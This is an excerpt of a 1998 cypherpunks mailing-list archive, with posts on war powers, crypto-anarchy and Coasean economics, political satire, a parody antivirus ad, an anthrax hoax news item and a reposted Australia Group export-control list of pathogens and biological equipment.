to (1) a declaration of war, (2) specific statutory authorization, or
(3) a national emergency created by an attack upon the United States.
..."

"A debate and vote on the use of force is especially important here,
since many members of Congress have publicly expressed reservations
about the timing of the attack, and Congressional resolutions have been
introduced about the use of force in Iraq," Nojeim said.

One of those resolutions expressed the sense of Congress that the United
States should not take military action against Iraq unless that action
was first authorized by Congress. That resolution, H. Con. Res. 226, was
introduced in February 1998, gathered 108 co-sponsors, but was never
voted on by the full House.

The ACLU said that the resolution that was adopted by the House today,
H. Res. 612, does not meet the requirements of the War Powers Act, and
that the Iraq Liberation Act, which was adopted by Congress and signed
by the President in October, did not authorize the use of U.S. forces in
Iraq.

"A debate would help ensure that all viewpoints on this important issue
are considered," Nojeim said, "and a vote ensures that such an important
decision has been endorsed by the people through their representatives
in Congress." 

        




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Tue, 22 Dec 1998 03:43:00 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Hayek Quote of the Week - Rule of Law
In-Reply-To: <v04020a0fb2a4425ee75f@[139.167.130.249]>
Message-ID: <v04020a17b2a44da08cf5@[139.167.130.249]>
MIME-Version: 1.0
Content-Type: text/plain



At 1:22 PM -0500 on 12/21/98, Robert Hettinga wrote:



> "It is often not recognized that general and equal laws
> provide the most effective protection against infringement
> of individual liberty, this is due mainly to the habit of
> tacitly exempting the state and its agents from them and
> of assuming that the government has the power to
> grant exemptions to individuals.

Woops. Corrected version:

"IF it is often not recognized that general and equal law
provide the most effective protection against infringement
of individual liberty, this is due mainly to the habit of
tacitly exempting the state and its agents from them and
of assuming that the government has the power to grant
exemptions to individuals."

etc...


Cheers,
RAH
-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Mon, 21 Dec 1998 22:05:00 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199812211329.OAA25839@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



The Ministry of Information announces the following:

In order to ensure domestic tranquility and the maximum 
protection of human rights by reducing crimes against humanity, 
be it enacted that

- There shall be no whispering in public; you should have nothing 
to hide unless you are a criminal

- You may not walk or gather in groups of two or more; such gathering 
is an indication that you may be conspiring to commit some illegal act

- You may not have locks on your house; you should have nothing that you 
are keeping from the collective

- You are not to draw the blinds or curtains in your house; law-abiding 
citizens have nothing to hide

- All future voting will be by voice vote before the General Assembly; you 
will also proclaim your support for the Party before casting your vote

- You will not think.  Free thought is for those that conspire against the 
righteous government

- You will not associate with the Cypherpunks; they are enemies of those that 
would oppress you

<UNSUB>
        




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Tue, 22 Dec 1998 05:26:23 +0800
To: Declan McCullagh <cypherpunks@toad.com
Subject: Re: Friedman (The Younger) Sings...
In-Reply-To: <v04020a0eb2a43f1b22a0@[139.167.130.249]>
Message-ID: <v04020a19b2a4536eea30@[139.167.130.249]>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

At 2:06 PM -0500 on 12/21/98, Declan McCullagh wrote:


> I see Bob is incorrectly assuming that the folks at the Cato Institute knew
> nothing about cryptoanarchy before David's speech this fall...


I see Declan is correctly picking nits about my use of the word "the". :-).
Your definition of "is" may vary, of course. Must be the water in DC, or
something. ;-).

The actual content of Freidman's speech aside (apparently), I stand upbraided,
your honor, as I'm sure *you* told the Catons all about CryptoA way before
they *ever* heard of Friedman. ;-).

(Yes, I know, Declan, you *know* Freidman, he was a good friend of yours, and
so forth and so on...)

> (The audience may be a different story, though.)

- From the questions, which were the standard clueless ones one gets from the
"policy" establishment on cryptoanarchy and anarchocapitalism, and, frankly,
cryptography in general, it sounded to me like they were receiving a first
hearing of Dr. Friedman, the putative (philosophical) godfather of all
cypherpunkery. An attack on flatland from the sky, and all that.

One way or another, the proof is in the .ra viewing, for anyone who wants to
go look for themselves.


Which segues me, in an attempt to ad value to the thread, other than thrashing
Declan for his nits :-), viz:

Given the remarkable cypherpunk-like sound of Dr. Friedman, the real question
here is, who came first, Freidman-egg, or cypherpunk-chickens?  The first
edition of "The Machinery of Freedom" came out in the early 1980's, (83?,
though somewhat-recently revised), yet Freidman leans heavily on post-mid-80's
Chaum in his talk to Cato, and uses heretofore cypherpunk neology, like
"anonymous remailers", "reputation capital", and the like. Not to mention
actual citation of the list itself in reference to Brin's book about the
hopelessness of all privacy.


And, of course, cash-settled information purchases. He mentions IPiracy in his
Cato talk, and tries to work around it contractually, and intimates that
watermarking might be silly unless you can recompile your code with
canary-traps for every customer, but doesn't say anything, like he should,
about Hughes'"organized piracy" idea, much less recursive (geodesic) auctions,
and so forth, as the obvious emergent solution to the whole problem of
"intellectual" property. Maybe he prefers contracts because he's employed by a
law school, or something? :-).


Personally, I think myself that people haven't read Coase closely enough. That
is, it seems to me that an encrypted copy of something in storage of my
exclusive control is about as private as private property can get, and as
such, I can sell it for whatever I can get for it.

If it's on my hard drive, it ain't yours anymore, in other words. Somewhere,
in my rants-to-do stack, is something on this topic, especially in light of
the explosively emerging MP3 market out there, and, paradoxically, the market
for the blind signature patent.


Cheers,
RAH



-----BEGIN PGP SIGNATURE-----
Version: PGP for Personal Privacy 5.5.5

iQEVAwUBNn6yaMUCGwxmWcHhAQGn7AgAnFh2pumeFsOQBhrcyQbKV2omDNEEpFcU
xktNynBgxivNl52mhdJICQGtCsYR2s1riiPK5Z5e+y7n4VJ1sEI+x4t8msnHDxmP
ushpr9hjVpRBXB6+CinuMsZoWljFUwQzGjeHvoLPKAk2xyzZ1HxP2ZofBKqKvi3h
SZw/m/ZtcooasDPkl5M4dAXs95/+MclddiTTgeVkytnW0MTMfiNIdUHICAxZBWmX
sxJfLan66sIvKwmDJsH/Ilhq/Ng4vYKtFTBic2qJGql1oTPi3wX3fv/VYY0eB68J
+wdo90a7Q7SLsYtX3s0QE/gxSMtcmj8CaZ9iMPECBRjFO4hcZRmVmQ==
=moEV
-----END PGP SIGNATURE-----
-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: remailer@rugratz.com (NewzBot)
Date: Tue, 22 Dec 1998 08:55:58 +0800
To: cypherpunks@cyberpass.net
Subject: Amazing New Virus from NAI!!!
Message-ID: <199812220024.QAA09843@uwin1.u.washington.edu>
MIME-Version: 1.0
Content-Type: text/plain



Network Associates has just announced an NT virus which spreads over
LAN/WANs.
 
Fortunately, there is a solution.  To speak to an NAI customer service
representative, please call 800 338-8754.
 
* Written in "C", an initial estimates is that it took NAI programmers 200
or more man-hours to write.
 
Fortunately, there is a solution.  To speak to an NAI customer service
representative, please call 800 338-8754.
 
Remember, there's a FREE Solution for Licensed NAI Corporate Customers
 
Or If you are not a Licensed NAI Customer, just click to purchase the
necessary anti-virus products online on our handy webpage.
 
      http://www.nai.com/antivirus/remote_explorer.asp
 
Network Associates:  The company you can trust, because we bought out
Phil Zimmermann!
 
Copyright (C) 1998 by Your Friends at Network Associates




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Richard.Bragg@ssa.co.uk
Date: Tue, 22 Dec 1998 02:24:23 +0800
To: cypherpunks@toad.com
Subject: Re:
Message-ID: <802566E1.005F6E44.00@seunt002e.ssa.co.uk>
MIME-Version: 1.0
Content-Type: text/plain



In addition:

You shall inform your local party representative (lpr) of all journeys to
be made and the purpose
thereof.  Only the guilty will wish to conceal their movements.

You shall also inform your lpr on any deviation from the registered
journey.  The innocent have
nothing to hide.

You shall share all personal information about yourself including bank
access codes and all
passwords.  You do trust The Party don't you?

Failure to comply with any regulation shall incure a with-holding of all
bodily functions order.
Compliance is entirely volentary.  Assistance with complience can be found
in you local
Yellow Pages or other business directory under Surgery, lobotomy or
Political Party, Membership.

Long life to the Party, slow and painful death to all who oppose us.
Resistance is useless.
You want a secure and happy life don't you?






Anonymous <nobody@replay.com> on 21/12/98 13:29:50

To:   cypherpunks@toad.com
cc:    (bcc: Richard Bragg/UK/SSA_EUROPE)
Subject:




The Ministry of Information announces the following:

In order to ensure domestic tranquility and the maximum
protection of human rights by reducing crimes against humanity,
be it enacted that

- There shall be no whispering in public; you should have nothing
to hide unless you are a criminal

- You may not walk or gather in groups of two or more; such gathering
is an indication that you may be conspiring to commit some illegal act

- You may not have locks on your house; you should have nothing that you
are keeping from the collective

- You are not to draw the blinds or curtains in your house; law-abiding
citizens have nothing to hide

- All future voting will be by voice vote before the General Assembly; you
will also proclaim your support for the Party before casting your vote

- You will not think.  Free thought is for those that conspire against the
righteous government

- You will not associate with the Cypherpunks; they are enemies of those
that
would oppress you

<UNSUB>









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Tue, 22 Dec 1998 07:38:39 +0800
To: Digital Bearer Settlement List <cryptography@c2.net
Subject: dbts: Georecursive Auctions (was Re: Friedman (The Younger)Sings...)
Message-ID: <v04020a1eb2a4698f1e10@[139.167.130.249]>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----


At 4:01 PM -0500 on 12/21/98, Somebody wrote:


> > If it's on my hard drive, it ain't yours anymore, in other
> > words.
>
> What are the assumptions?  Assuming that you were given what is on your hard

> drive, or can you have procured it by any means, like piracy, theft, etc.

:-).

I'm going to do a real rant on this, someday Real Soon Now, and you can see
the germ of the idea in Freidman's talk, and in my old Shipwright rants
<http://www.shipwright.com/>, and also, I think, on the Philodox site
<http://www.philodox.com/>.

More to the point, we all, as far as I can tell, stole it from Eric Hughes,
who even went so far as to present a paper on the subject, long ago at a
DEFCON far away. Who knows where *he* got it from, but that's enough geneology
for the time being...



The point I'm making above comes from Ronald Coase, the father of modern
microeconomics, winner of Nobel for same, circa 1992?.

The most important thing that Coase said, the thing which got him the Nobel,
was that firm size was directly related to transaction cost.

In an information economy, especially in a world of Moore's law (yielding
increasingly geodesic networks, and the markets overlaid on them) and strong
cryptography (digital bearer transactions, perfect pseudonymity, etc.),
tranaction costs get *very* small indeed, and in a considerable hurry.

To some, I believe clueless :-), people, the above means that we still get
economies of scale, because the first copy of a given modern bloatware
application, like Word for Windows, is enormously expensive compared to its
replication cost, which is functionally free by comparison, even if you put a
box around it, much less if you just put it up for download from the web.

However, *I* say that if you can do profitable transactions in, say, the
micropenny range, you get a world where the bloated, industrially-delivered
code-in-boxes that we've all come to know and love starts to surfact, under
its own weight, into smaller and smaller functional bits, each maintained by
different, and much smaller, firms.

I use open source software as my case in point. Notice that, since the cost of
code itself is free, there is a huge, and expanding, diversity of very
specialized code out there now. The writers of that code don't make any money
on that code except by proxy, through enhanced reputation, and so forth.
However, if you could drive the cost of *transactions* down, people *would*
write code just for the money, and simply auction it off their websites to the
highest bidder, and could do so, profitably, for rediculously cheap prices.
More about that in a minute.


Sure, Red Hat grosses $20 million, but that's more a function of the
cost-domination of sneaker-netted CDROM over the still-scrawny lower
capillaries of the internet. More to the point, I claim, it's the result of
the cost of *credit-cards*, even *checks*, as a way to pay for code.
Book-entry settlement, in other words, which is done "out of band", over
private, hierarchical, and proprietary financial transaction networks.

If it were possible to pay to download code, as you needed it, for
instantaneously net-settled *cash*, and for sufficiently small enough bits of
money, then the need, the price-economy, if you will, for large glops of code
would go away.

And, Coase's theorem says (I think) so too would the large firms required to
generate those large glops of code.


So, what we're left with is a world where the legalities of intellectual
property are physically impossible to enforce, thus words like "privacy" cease
to have any real meaning. If you can't enforce such an intellectual "property"
law, it's kind of hard to call it a law, as most law professors and
philosophers of law will tell you.

Ironically, I claim, that's a very strong form of a *second* observation that
Ronald Coase made, that you can't have markets without private property.
Sounds like a motherhood, now, but he was the first person to articulate that
clearly, back in the early part of this century, and it's one of the reasons
he got the Nobel, of course.

*My* variant on Coase says that you don't need *laws* to ensure private
property in digital form. Cryptography will do just fine. Like I said, if it's
encrypted, and it's on my hard drive, it's now *mine* no matter where I got
it, laws or not. I mean, who's to know I have it to begin with, and, more to
the point, who's going to take it away without my permission, especially in a
world of encrypted offsite net.backups, m-of-n archival reconstruction, etc.

Write software, not laws, to quote the my old cypherpunk chestnut.


Yet, I claim, to finally answer your point :-), people who *make* new code in
such abrave new world, *still* make the most money. No, not "publish", or even
distribute new code, like Microsoft and Ingram do, but the actual guy plinking
away in CodeWarrior, or whatever. The mind behind the code, the developer,
let's call him, in a proper use of the now mostly corrupted word.


Here's how. You write software for a living. You upgrade your existing code
base, and you announce its availablity to the net. Everyone who has your code
knows how good your work is, and they probably have a standing bid in to buy
revs of it at some specific price, anyway. So, just like the specialist's book
at the New York Stock Exchange, you, or your website's CGI, accepts those
bids, highest to lowest, and, as new bids come in, you sort them into the
queue of outstanding orders, by price, of course, :-), and accept them in that
order.

Notice something important, but obvious, here. The people who bid the highest
get the first copy. We'll worry about Vickery variations on that auction some
other time.

Secondly, there's the fun part, the *recursive* part of "geodesic recursive"
or neologically, and, this very afternoon, "georecursive", auctions.

That is, if I paid a monster pile for the first copy, I must have such a
profitable need for it that it's worth it to me to pay that much. Of course,
one of the most profitable things I can do especially in a world where the net
isn't quite geodesic enough yet, and Freidman hints at this in his Cato talk,
is to *flip* that code.

Frankly, this is nothing really now. It's done identically the same way that
large institutions flip IP0's in the market for a hot stock, or, more
properly, a recording company or software "publisher" puts "talent" under
contract and remarkets their output in classical vertically-integrated, and I
say, now-industrial, markets for those goods.


So, back to the future, I pay through the nose to get to the first copy of
your code, because I have an orderbook of my *own* to fill, and, more
properly, I have sufficient bandwidth and processing power of my own to
remarket it. Even more fun, someone *else* can buy from me, and resell what I
sell them, *recursively*, ad infinitum, and, frankly I don't really *care*
what they do with what I sold them, because I've already bought low and sold
high.

I claim, even with all this rampant "piracy", and, especially as the network
gets more geodesic -- a process which these markets would probably
*accellerate* by the way think what would happen if you could sell bandwidth
this way -- the person who collects the most economic "rent" would be *you*,
the originator of the new code. Just like a rock star, if the code was popular
enough, but without the recording company. Well, actually, with lots of very
*little* record *distributors*, all taking a haircut, and, rarely would any of
them make anything near like what you made selling the first copies.

I mean, new information always costs more than old information, right? And, of
course, you, as a developer, will always have the *newest* information of
all...


Finally, it even behoves huge companies who control large blocks of
intellectual property, record companies, and Microsoft, for instance, :-), to
compete in this new kind of market, precisely *because* the the transaction
costs are so low and the initial profit margins are correspondingly higher.

It's *profitable* to play in this market, even when you're losing market
share, paradoxically, to smaller players. Think of what happened to large
movie studios in the 1960's and '70's, and how they were replaced, in the
*production* of movies, by director-owned, mostly ad-hoc, "virtual" production
companies, like Coppola's Zoetrope, or Speilburg's Amblin, or Lucasfilm/ILM.
Even the new "studios", like Dreamworks/SKG are really director-run
enterprizes (Spielburg and Geffen, remember?).

The "directors", the "auteurs" of software, are pretty much the guys who write
the code, yes?

Everything else is just transaction cost.


Cheers,
Robert Hettinga


-----BEGIN PGP SIGNATURE-----
Version: PGP for Personal Privacy 5.5.5

iQEVAwUBNn7OucUCGwxmWcHhAQFidwf+MZ8SLZffWvH7g+QMY6Q2Q3P4flVkEVpr
keXiF7cXXKlv/zL48wX1fjan93MMwN65b9/o7aIe1Wvq1nQfFE1AhPaShYZwciz9
NpInA2+9Mrz30cU4Nj775gXHfCaFl68tUmKd8GwUBI4rwjrHKgFy5hFSWlxNQSFF
yQ8idMnmC7fSIELZJOurejYM90nA4z9QZZibekVuP+u3e6ogkclCS8m3e3QznpWY
yCTYHqFFc5JHHEHc4PCOALWei74/rTRVvaziEU3QQCvytXgsZu2j0OLkpukc4zqb
eJD/+Zkc3d1pfTqxaR4tLatr+QXVEuxozwz3nyoo3mzfd0LbKdBdnA==
=kKXa
-----END PGP SIGNATURE-----
-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Tue, 22 Dec 1998 01:53:03 +0800
To: cypherpunks@toad.com
Subject: bugs and gas
Message-ID: <199812211711.SAA10468@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



>>>This is not how anthrax spreads. Communicability between humans is nearly
>>>nonexistent.

This is basically an advertizement for anthrax:
http://www.defenselink.mil/specials/Anthrax/anth.htm#medically

An index of CBW sites: 
http://www.cbiac.apgea.army.mil/


Chemical defense:
http://chemdef.apgea.army.mil/fm8-9/part_iii/index.htm








  







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Tue, 22 Dec 1998 02:20:15 +0800
To: cypherpunks@toad.com
Subject: export controlled fermenters
Message-ID: <199812211728.SAA12954@replay.com>
MIME-Version: 1.0
Content-Type: text/plain




http://www.acda.gov/factshee/wmd/bw/auslist.htm



LIST OF DUAL-USE BIOLOGICAL EQUIPMENT
FOR EXPORT CONTROL

1. Complete containment facilities at P3, P4 containment level

Complete containment facilities that meet the criteria for P3 or P4 (BL3,
BL4, L3, L4) containment as specified in the WHO Laboratory Biosafety
manual (Geneva, 1983) are subject to export control. 

2. Fermenters*

Fermenters capable of cultivation of pathogenic micro-organisms, viruses or
for toxin production, without the propagation of aerosols, and having all
the following characteristics:


(a) capacity equal to or greater than 100 litres;
*Sub-groups of fermenters include bioreactors, chemostats and
continuous-flow systems.

3. Centrifugal Separators*

Centrifugal separators capable of the contiuous separation of pathogenic
micro-organisms, without the propagation of aerosols, and having all the
following characteristics:


(a) flow rate greater than 100 litres per hour;
(b) components of polished stainless steel or titanium;

(c) double or multiple sealing joints within the steam containment area; 

(d) capable of in-situ steam sterilization in a closed state.

*Centrifugal separators include decanters.

4. Cross-flow Filtration Equipment

Cross-flow filtration equipment capable of continuous separation of
pathogenic microorganisms, viruses, toxins and cell cultures without the
propagation of aerosols, having all the following characteristics:


(a) equal to or greater than 5 square metres;
(b) capable of in-situ sterilization.

5. Freeze-drying Equipment

Steam sterilizable freeze-drying equipment with a condensor capacity
greater than 50 kgs of ice in 24 hours and less than 1000 kgs of ice in 24
hours.

6. Equipment that incorporates or is contained in P3 or P4 (BL3, BL4, L3,
L4) containment housing, as follows:


(a) Independently ventilated protective full or half suits;
(b) Class III biological safety cabinets or isolators with similar
performance standards.

7. Aerosol inhalation chambers

Chambers designed for aerosol challenge testing with microorganisms,
viruses or toxins and having a capacity of 1 cubic metre or greater.

The experts propose that the following item be included in awareness
raising guidelines to industry:

1. Equipment for the micro-encapsulation of live micro-organisms and toxins
in the range of 1-10 um particle size, specifically:


(a) Interfacial polycondensors;
(b) Phase separators.

2. Fermenters of less than 100 litre capacity with special emphasis on
aggregate orders or designs for use in combined systems.

3. Conventional or turbulent air-flow clean-air rooms and self-contained
fan-HEPA filter units that may be used for P3 or P4 (BL3, BL4, L3, L4)
containment facilities. 



----------------------------------------------------------------------------
----


AUSTRALIA GROUP
LIST OF BIOLOGICAL AGENTS FOR EXPORT
CONTROL CORE LIST1

Viruses

V1. Chikungunya virus
V2. Congo-Crimean haemorrhagic fever virus
V3. Dengue fever virus
V4. Eastern equine encephalitis virus
V5. Ebola virus
V6. Hantaan virus
V7. Junin virus
V8. Lassa fever virus
V9. Lymphocytic choriomeningitis virus
V10. Machupo virus
V11. Marburg virus
V12. Monkey pox virus
V13. Rift Valley fever virus
V14. Tick-borne encephalitis virus (Russian Spring-Summer encephalitis virus)
V15. Variola virus
V16. Venezuelan equine encephalitis virus
V17. Western equine encephalitis virus
V18. White pox
V19. Yellow fever virus
V20. Japanese encephalitis virus

Rickettsiae

R1. Coxiella burnetii
R2. Bartonella Quintana (Rochalimea quintana, Rickettsia quintana)
R3. Rickettsia prowasecki
R4. Rickettsia rickettsii

Bacteria

B1. Bacillus anthracis
B2. Brucella abortus
B3. Brucella melitensis
B4. Brucella suis
B5. Chlamydia psittaci
B6. Clostridium Botulinum
B7. Francisella tularensis
B8. Burkholderia mallei (pseudomonas mallei)
B9. Burkholderia pseudomallei (pseudomonas pseudomallei)
B10. Salmonella typhi
B11. Shigella dysenteriae
B12. Vibrio cholerae
B13. Yersinia pestis

Genetically Modified Micro-organisms

G1. Genetically modified micro-organisms or genetic elements that contain
nucleic acid sequences associated with pathogenicity and are derived from
organisms in the core list.

G2. Genetically modified micro-organisms or genetic elements that contain
nucleic acid sequences coding for any of the toxins in the core list, or
their subunits.

Toxins as follow and subunits thereof:2

T1. Botulinum toxins
T2. Clostridium perfringens toxins
T3. Conotoxin
T4. Ricin
T5. Saxitoxin
T6. Shiga toxin
T7. Staphylococcus aureaus toxins
T8. Tetrodotoxin
T9. Verotoxin
T10. Microcystin (Cyanginosin)
T11. Alflatoxins

__________________

1. Except where the agent is in the form of a vaccine.
2. Excluding immunotoxins.



----------------------------------------------------------------------------
----


WARNING LIST1
Viruses

WV1. Kyasanur Forest virus
WV2. Louping ill virus
WV3. Murray Valley encephalitis virus
WV4. Omsk haemorrhagic fever virus
WV5. Oropouche virus
WV6. Powassan virus
WV7. Rocio virus
WV8. St. Louis encephalitis virus

Bacteria

WB1. Clostridium perfringens*
WB2. Clostridium tetani*
WB3. Enterohaemorrhagic Escherichia coli, serotype 0157 and other verotoxin
producing serotypes
WB4. Legionella pneumophila
WB5. Yersinia pseudotuberculosis

Genetically Modified Micro-organisms

WG1. Genetically modified micro-organisms or genetic elements that contain
nucleic acid sequences associated with pathogenicity and are derived from
organisms in the warning list.

WG2. Genetically modified micro-organisms or genetic elements that contain
nucleic acid sequences coding for any of the toxins in the warning list, or
their subunits.

Toxins as follow and subunits thereof:2

WT1. Abrin
WT2. Cholera toxin
WT3. Tetanus toxin
WT4. Trichothecene mycotoxins
WT5. Modeccin
WT6. Volkensin
WT7. Viscum Album Lectin 1 (Viscumin)

__________________

*The Australia Group recognizes that these organisms are ubiquitous, but,
as they have been acquired in the past as part of biological weapons
programs, they are worthy of special caution.

1. Except where the agent is in the form of a vaccine.

2. Excluding immunotoxins.



----------------------------------------------------------------------------
----


AUSTRALIA GROUP
LIST OF ANIMAL PATHOGENS FOR EXPORT CONTROL1

Viruses

AV1. African swine fever virus
AV2. Avian influenza virus2
AV3. Bluetongue virus
AV4. Foot and mouth disease virus
AV5. Goat pox virus
AV6. Herpes virus (Aujeszky's disease)
AV7. Hog cholera virus (synonym: Swine fever virus)
AV8. Lyssa virus
AV9. Newcastle disease virus
AV10. Peste des petits ruminants virus
AV11. Porcine enterovirus type 9 (synonym: swine vesicular disease virus)
AV12. Rinderpest virus
AV13. Sheep pox virus
AV14. Teschen disease virus
AV15. Vesicular stomatitis virus

_____________________

1. Except where the agent is in the form of a vaccine.

2. This includes only those Avian influenza viruses of high pathogenicity
as defined in EC Directive 92/401EC:

"Type A viruses with an IVPI (intravenous pathogenicity index) in 6 week
old chickens of greater than 1.2, or

Type A viruses HS or H7 subtype for which nucleotide sequencing has
demonstrated multiple basic amino acids at the cleavage site of
haemegglutinin."

Bacteria

AB3. Mycoplasma mycoides

Genetically-modified Micro-organisms

AG1. Genetically modified micro-organisms or genetic elements that contain
nucleic acid sequences associated with pathogenicity and are derived from
organisms in the list.



----------------------------------------------------------------------------
----


AUSTRALIA GROUP 
CONTROL LIST OF PLANT PATHOGENS FOR EXPORT CONTROL

CORE LIST

Baceria

PB1. Xanthomonas albilineans
PB2. Xanthomonas campestris pv. citri

Fungi

PF1. Colletotrichum coffeanum var. virulans (Colletotrichum Kanawae)
PF2. Cochliobolus miyabeanus (Helminthosporium oryzae)
PF3. Microcyclus ulei (syn. Dothidella ulei)
PF4. Puccinia graminis (syn. Puccinia graminis f. sp. tritici)
PF5. Puccinia striiformis (syn. Pucciniaglumarum)
PF6. Pyricularia grisea/Pyricularia oryzae

Genetically-modified Micro-organisms

PG1. Genetically-modified micro-organisms or genetic elements that contain
nucleic acid sequences associated with pathogenicity derived from the plant
pathogens identified on the export control list.



----------------------------------------------------------------------------
----


ITEMS FOR INCLUSION IN AWARENESS RAISING GUIDELINES
Bacteria

PWB1. Xanthomonas campestris pv. oryzae
PWB2. Xylella fastidiosa

Fungi

PWF1. Deuterophoma tracheiphila (syn. Phoma tracheiphila)
PWF2. Monilia rorei (syn. Moniliophthora rorei)

Viruses

PWV1 Banana bunchy top virus

Genetically-modified Micro-organisms

PWG1 Genetically-modified micro-organisms or genetic elements that contain
nucleic acid sequences associated with pathogenicity derived from the plant
pathogens identified on the awareness raising list. 







  







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Frederick Burroughs <riburr@shentel.net>
Date: Tue, 22 Dec 1998 10:09:59 +0800
To: Cypherpunks <cypherpunks@ns.minder.net>
Subject: Re: export controlled fermenters
In-Reply-To: <199812211728.SAA12954@replay.com>
Message-ID: <367EF915.829C1867@shentel.net>
MIME-Version: 1.0
Content-Type: text/plain





Anonymous wrote:

> http://www.acda.gov/factshee/wmd/bw/auslist.htm

> AUSTRALIA GROUP
> LIST OF BIOLOGICAL AGENTS FOR EXPORT
> CONTROL CORE LIST1

[...]

> Genetically Modified Micro-organisms
>
> G1. Genetically modified micro-organisms or genetic elements that contain
> nucleic acid sequences associated with pathogenicity and are derived from
> organisms in the core list.
>
> G2. Genetically modified micro-organisms or genetic elements that contain
> nucleic acid sequences coding for any of the toxins in the core list, or
> their subunits.
>
> Toxins as follow and subunits thereof:2
>
> T1. Botulinum toxins
> T2. Clostridium perfringens toxins
> T3. Conotoxin
> T4. Ricin
> T5. Saxitoxin
> T6. Shiga toxin
> T7. Staphylococcus aureaus toxins
> T8. Tetrodotoxin
> T9. Verotoxin
> T10. Microcystin (Cyanginosin)
> T11. Alflatoxins

[...]

Hmmm, mythical chimeras subject to export control? E. coli with a dinoflagellate
sting? Smegma that erupts into gas gangrene? Surely these nightmares are only
paranoid delusions of national security strategists who may have eaten British
beef too close to bedtime. A pox on their infections! And a swab of flesh eating
streptococcus on the lubri-smooth strip of all their razors, so they can't save
face.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Blanc" <blancw@cnw.com>
Date: Tue, 22 Dec 1998 13:23:27 +0800
To: "'Digital Bearer Settlement List'" <cypherpunks@toad.com>
Subject: RE: Friedman (The Younger) Sings...
In-Reply-To: <v04020a19b2a4536eea30@[139.167.130.249]>
Message-ID: <000601be2d68$d3fd63c0$878195cf@blanc>
MIME-Version: 1.0
Content-Type: text/plain



>From Bob Hettinga:

: Given the remarkable cypherpunk-like sound of Dr. Friedman, the real question
: here is, who came first, Freidman-egg, or cypherpunk-chickens?  The first
: edition of "The Machinery of Freedom" came out in the early 1980's, (83?,
: though somewhat-recently revised), yet Freidman leans heavily on post-mid-80's
: Chaum in his talk to Cato, and uses heretofore cypherpunk
: neology, like "anonymous remailers", "reputation capital", and the like.
: Not to mention actual citation of the list itself in reference to Brin's
: book about the hopelessness of all privacy.
.................................................


Friedman came first, though there were others before him, in reference to the
economic philosophical side of the anarchist-type ideas.  But Friedman sometimes
contributed to the Extropian list, as I remember when I was on it, and very
likely lurked on cypherpunks, as I remember seeing a post or two from him -
perhaps only because he was copied on a question.  But he was 'exposed', so to
speak, to the cpunkish themes from either, or both, lists, and no doubt had
off-line conversations on these subjects.

   ..
Blanc




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Cordian <emc@wire.insync.net>
Date: Tue, 22 Dec 1998 12:28:04 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Anthrax Theatre
Message-ID: <199812220337.VAA18943@wire.insync.net>
MIME-Version: 1.0
Content-Type: text/plain



Friday's debut of "Anthrax Theatre" was such an critically aclaimed
success, that another performance was given today, to an audience ten
times the size.
 
-----
 
LOS ANGELES (AP) -- A telephoned anthrax threat forced as many as
1,500 people to be quarantined for several hours on Monday at two
courthouses before it was found to be a hoax.
 
A man called the 911 emergency line at about 11 a.m. and stated ``I
have something to tell you -- anthrax has been released in the Van
Nuys courthouse,'' then hung up, said Laura Bosley, a spokeswoman for
the FBI.
 
The old and new Superior Court buildings in Van Nuys were sealed off
and up to 1,500 people taken outside and isolated to determine whether
they were exposed to any hazardous materials, authorities said.
 
Hazardous materials crews with face masks, air tanks and protective
suits were sent inside.
 
``They did an investigation and nothing was found,'' said Jim Wells, a
spokesman for the city Fire Department.
 
No major injuries or illnesses were reported.

-- 
Eric Michael Cordian 0+
O:.T:.O:. Mathematical Munitions Division
"Do What Thou Wilt Shall Be The Whole Of The Law"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Mynott <steve@tightrope.demon.co.uk>
Date: Tue, 22 Dec 1998 06:30:48 +0800
To: Robert Hettinga <cypherpunks@cyberpass.net
Subject: Re: Friedman (The Younger) Sings...
In-Reply-To: <v04020a0eb2a43f1b22a0@[139.167.130.249]>
Message-ID: <19981221214313.A21655@tightrope.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain



On Mon, Dec 21, 1998 at 03:41:53PM -0500, Robert Hettinga wrote:
 
> Given the remarkable cypherpunk-like sound of Dr. Friedman, the real question
